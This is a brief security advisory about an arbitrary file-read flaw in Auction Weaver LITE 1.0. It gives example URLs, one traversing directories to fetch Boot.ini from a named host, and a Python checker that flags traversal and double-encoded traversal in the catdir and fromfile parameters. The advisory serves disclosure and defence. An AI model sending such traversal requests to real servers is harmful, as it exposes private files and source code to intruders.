
Auction Weaver Read Arbitrary Files



Vulnerability

    Auction Weaver

Affected

    Auction Weaver™ LITE 1.0

Description

    Meliksah Ozoral found the following.  Auction Weaver allows remote
    users to read files from the server, including the source of files
    on the server.  Example requests:

        http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=cat17&fromfile=967251278%2Edat
        http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini
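
    As an added example (not part of the original advisory and not
    Auction Weaver's own code), the following Python check flags requests
    whose catdir or fromfile value, once percent-decoded, does not stay a
    single file-name component.  The allow-list pattern is an assumption,
    and the third sample request is constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters the advisory shows being used to select the file to read.
PATH_PARAMS = ("catdir", "fromfile")
# Assumed allow-list: one path component, no leading dot.
SAFE_COMPONENT = re.compile(r"^[A-Za-z0-9_-][A-Za-z0-9_.-]*$")

# Request targets: the first two are from the advisory, the third is a
# constructed double-encoded variant used to exercise decode_fully().
SAMPLES = [
    "/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=cat17&fromfile=967251278%2Edat",
    "/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\\..\\..\\..\\..\\..\\..\\..\\..\\&fromfile=Boot.ini",
    "/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=%252E%252E%255C%252E%252E&fromfile=x.dat",
]


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is unmasked."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def audit_request(target):
    """Return {param: reason} for each path parameter that fails validation."""
    findings = {}
    # parse_qs performs the first round of percent-decoding.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name in PATH_PARAMS:
        for raw in query.get(name, []):
            value = decode_fully(raw)
            if "/" in value or "\\" in value:
                findings[name] = "path separator"
            elif ".." in value:
                findings[name] = "dot-dot sequence"
            elif not SAFE_COMPONENT.match(value):
                findings[name] = "disallowed characters"
    return findings


if __name__ == "__main__":
    for sample in SAMPLES:
        print(audit_request(sample) or "ok", sample)
```

    The same rule can be applied to stored access logs to find earlier
    requests of this kind, or in front of the script as a request filter.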

Solution

    Upgrade to 1.2.

